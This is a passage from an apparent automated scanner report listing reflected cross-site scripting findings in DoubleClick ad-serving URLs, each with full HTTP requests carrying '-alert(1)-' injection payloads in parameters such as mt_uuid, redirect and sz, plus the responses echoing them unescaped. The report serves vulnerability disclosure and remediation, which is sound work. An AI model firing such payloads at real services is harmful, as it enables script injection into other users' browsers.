document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4ac"-alert(1)-"007c6132307 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:32 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:32 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bbb4ac"-alert(1)-"007c6132307&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...

5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95c6a'-alert(1)-'c3ace347376 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:37 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:37 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b95c6a'-alert(1)-'c3ace347376&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c9ed'-alert(1)-'60d03a3f198 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:45 GMT
Expires: Sat, 26 Mar 2011 01:38:45 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=3c9ed'-alert(1)-'60d03a3f198https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ef8"-alert(1)-"92ebfe0424f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 01:38:41 GMT
Expires: Sat, 26 Mar 2011 01:38:41 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=21ef8"-alert(1)-"92ebfe0424fhttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...

5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bec3'-alert(1)-'b3534d6f54d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:11 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:11 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=543937510663803792bec3'-alert(1)-'b3534d6f54d&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ede"-alert(1)-"78d948007db was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:07 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:07 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379e7ede"-alert(1)-"78d948007db&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26d19'-alert(1)-'06d1516c0ac was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 670
Date: Sat, 26 Mar 2011 01:37:49 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:37:49 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad6/c/a6/%2a/c;235638519;0-0;0;59396967;3454-728/90;40463950/40481737/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=7026d19'-alert(1)-'06d1516c0ac&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUSMK2%26selleracctnb
...[SNIP]...

5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.43

Issue detail

